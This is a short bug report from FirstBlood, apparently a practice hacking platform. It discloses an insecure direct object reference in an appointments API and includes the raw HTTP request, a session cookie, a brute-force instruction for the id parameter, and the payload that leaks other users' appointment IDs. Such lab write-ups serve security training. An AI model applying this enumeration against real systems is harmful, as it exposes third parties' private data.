FirstBlood-#246 — Idor
This issue was discovered on FirstBlood v1
On 2021-05-14, thesecguy Level 2 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
bug
fetching aptid values
request
POST /api/qa.php HTTP/1.1
Host: firstbloodhackers.com:49709
Content-Length: 11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://firstbloodhackers.com:49709
Referer: http://firstbloodhackers.com:49709/yourappointments.php
Accept-Encoding: gzip, deflate
Accept-Language: en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: drps=569ffbc7c6c2c8569e20b65c3
Connection: close
id=569[11493]
In the above request bruteforce the last six values to leak the aptid of the appointment
impact
able to see third party appointments with uuid
P2 High
Endpoint: /api/qa.php
Parameter: id=
Payload: 56911493
FirstBlood ID: 5
Vulnerability Type: Insecure direct object reference
The endpoint QA.php (to query for an appointment) will allow for integer values to be used when querying for appointments. A bad cause of security through obscurity was attempted.